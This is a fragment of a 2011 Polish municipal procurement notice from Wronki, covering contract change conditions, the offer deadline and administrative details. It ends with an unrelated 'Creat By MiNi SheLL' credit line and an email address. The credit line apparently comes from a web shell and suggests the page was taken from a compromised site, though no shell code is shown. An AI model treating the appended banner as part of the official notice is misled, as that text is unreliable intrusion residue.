3)	zmiany podwykonawców, których udział w realizacji przedmiotu umowy zaakceptował Zamawiający,
4)	zmiany osobowe - zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo Budowlane lub innych ustawach,
5)	wystąpienie wyjątkowych okoliczności, niezależnych od Stron umowy, których nie mogły one przewidzieć w chwili zawierania umowy wpływających na jej realizację.
5.	Zmiany, o których mowa w ust. 4  mogą zostać dokonane, jeżeli zachodzą i są ich uzasadnieniem niżej wymienione okoliczności:
1)	obniżenie kosztu wykonania usług (wynagrodzenia Wykonawcy), 
2)	zmiany obowiązujących przepisów,
3)	siła wyższa.
6.	Zakazuje się zmiany umowy, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę. W takim przypadku koszty dodatkowe związane z takimi zmianami ponosi Wykonawca.
7.	Dokonanie zmian, o których mowa  w ust. 4 pkt 2 wymaga formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.wronki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: Urząd Miasta i Gminy Wronki ul. Ratuszowa 5, 64-510 Wronki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2011 godzina 12:00, miejsce: siedziba Zamawiającego: Urząd Miasta i Gminy Wronki ul. Ratuszowa 5, 
64-510 Wronki, pokój nr 6 - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com